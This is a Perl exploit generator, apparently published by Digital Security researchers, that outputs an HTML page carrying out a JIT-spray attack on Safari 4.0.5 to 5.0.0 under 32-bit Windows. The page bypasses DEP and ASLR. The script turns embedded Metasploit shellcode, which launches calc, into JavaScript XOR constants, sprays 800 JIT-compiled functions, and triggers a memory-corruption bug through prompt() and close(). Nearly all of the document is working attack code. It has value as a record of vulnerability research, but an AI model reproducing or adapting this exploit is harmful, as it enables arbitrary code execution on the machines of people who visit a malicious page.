#!/usr/bin/perl
#
# Script JIT shellcode generator
# for DEP and ASLR bypass
# tested on Safari (ver. 4 and 5)
# By Alexey Sintsov (dookie at inbox.ru / a.sintsov at dsec.ru)
# from Digital Security 
# [www.dsecrg.com]
# 
# Details: http://dsecrg.com/pages/pub/show.php?id=26
# P.S. here is 0x1000 as mul. factor: (0x0000XXYY*0x00010000=0xXXYY0000)
# this much better for automatic generation than mul. of sqrt of 0xXXYY0000 8)
#
#
# Safari 4.0.5 Memory corruption exploit
# Orig exploit by Krystian Kloskowski
# (used for demo)
#
#
# Special for www.xakep.ru
# 
# Usage:perl safari_jit.pl > exploit.html
#
# 
#
	#Shellcode from Metasploit - Exec CALC
	$shellcode = 
	"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" .
	"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
	"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" .
	"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" .
	"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" .
	"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" .
	"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" .
	"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" .
	"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" .
	"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" .
	"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" .
	"\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95" .
	"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" .
	"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5calc\x00";
	
	#Address with RWX - place for shellcode
	$addr="\x08\x0A"; #0x080A0000

	
#################################################################
########                     BEGIN                    ###########
#################################################################	
	
	$len=length($shellcode);
	
	$add=$len % 4;
	
	$copyJit="";
	
	for($i=0;$i<$add;$i++)
	{
		$shellcode.="\xCC";
	}
	
	$offsetJit="\"0x22222222^\"+/* START OF OFFSET */\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+ /*SHELLCODE BEGINS*/\n";	
			
		
	# Init JIT shelcode
	$initJit="\"0x14EBC031^\"+//XOR EAX,EAX\n".
			 "\"0x14EB01B4^\"+\n". 
			 "\"0x14EB00B0^\"+\n".
			 "\"0x14EBE0F7^\"+// EAX=0x100*0x100\n". 
			 "\"0x14EBF08B^\"+// MOV ESI, EAX ;ESI=00010000 - MUL factor\n". 
			 "\"0x14EBC031^\"+ //XOR EAX,EAX\n".
			 sprintf("\"0x14EB%02lxB4^\"+\n",ord substr($addr,0,1)).
			 sprintf("\"0x14EB%02lxB0^\"+\n",ord substr($addr,1,1)).
             "\"0x14EBE6F7^\"+ // MUL ESI; EAX - RWX memory for shellcode\n".
			 "\"0x14EBC88B^\"+ // mov ecx, eax ; ECX - pointer on RWE mem\n".
			 "\"0x14EBDB33^\"+ // xor ebx, ebx\n".
			 "\"0x14EB04B3^\"+ // mov bl, 4    ; EBX = 0x4 - step \n";
			 
	
	#Convert shellcode into JIT code
	for($i=0;$i<length($shellcode);$i+=4)
	{
		my $val="";
		$byte1=substr($shellcode,($i+3),1);
		$byte2=substr($shellcode,($i+2),1);
		$byte3=substr($shellcode,($i+1),1);
		$byte4=substr($shellcode,($i),1);
		$val.="\"0x14EBC031^\"+ //XOR EAX,EAX\n";
		$val.= sprintf("\"0x14EB%02lxB4^\"+ //MOV AH\n",ord $byte1);
		$val.= sprintf("\"0x14EB%02lxB0^\"+ //MOV AL\n",ord $byte2);
		$val.= "\"0x14EBE6F7^\"+ //MUL ESI\n";
		$val.= sprintf("\"0x14EB%02lxB4^\"+ //MOV AH\n",ord $byte3);
		$val.= sprintf("\"0x14EB%02lxB0^\"+ //MOV AL\n",ord $byte4);
		$val.="\"0x14EB0189^\"+ // mov [ecx], eax ; copy part of shellcode to RWX page\n".
			  "\"0x14EBCB03^\"+ // add ecx, ebx ; ecx=ecx+4 - move pointer for next copy\n";
		      
		$copyJit.=$val;
		
	}

	$jumJit="\"0x14EB00B5^\"+ // mov ch, 00\n".
			"\"0x14EB00B1^\"+ // mov cl, 00 ; ECX - RWE memory WITH shellcode\n".
			"\"0x14EBE1FF^\"+ // JMP ECX ; PROFIT! \n";
			
	
	$page="
<!-- 
JIT-SPRAY
           for
                 Safari 4.0.5 - 5.0.0

(vuln for 4.0.5 only)

JavaScript JIT SHELLCODE and spray
             for
	     ASLR / DEP bypass (Win x32)
		 
By Alexey Sintsov
   from Digital Security research Group
 
special for www.xakep.ru

[DSecRG]
www.dsecrg.com

-->

<script>

function make_buf(payload, len) {
    while(payload.length < (len * 4)) payload += payload;
    payload = payload.substring(0, len);
    return payload;
}

function fff()
{

	var a = parent;

	var buf = make_buf(unescape('%u0104%u0606'), 68000);
	
	
    a.prompt(alert);
    a.prompt(buf);
    a.close();
	a.prompt(alert);
	
}

var SPRAY=\"\";

var JIT=\"{ \"+
\"var y=(\"+
";

$endPage="\"0x14ebcccc\"+
\");\"+
\"return y; }\";


var zl=\"zlo_\";
	
for (var i=1;i<800;i++)
{
	SPRAY+=\"function \"+zl+i+\"()\"+JIT+\" \"+zl+i+\"();\";
}

eval(SPRAY);


fff();
</script>


</center>";

#build page
$page.=$offsetJit.$initJit.$copyJit.$jumJit.$endPage;

print $page;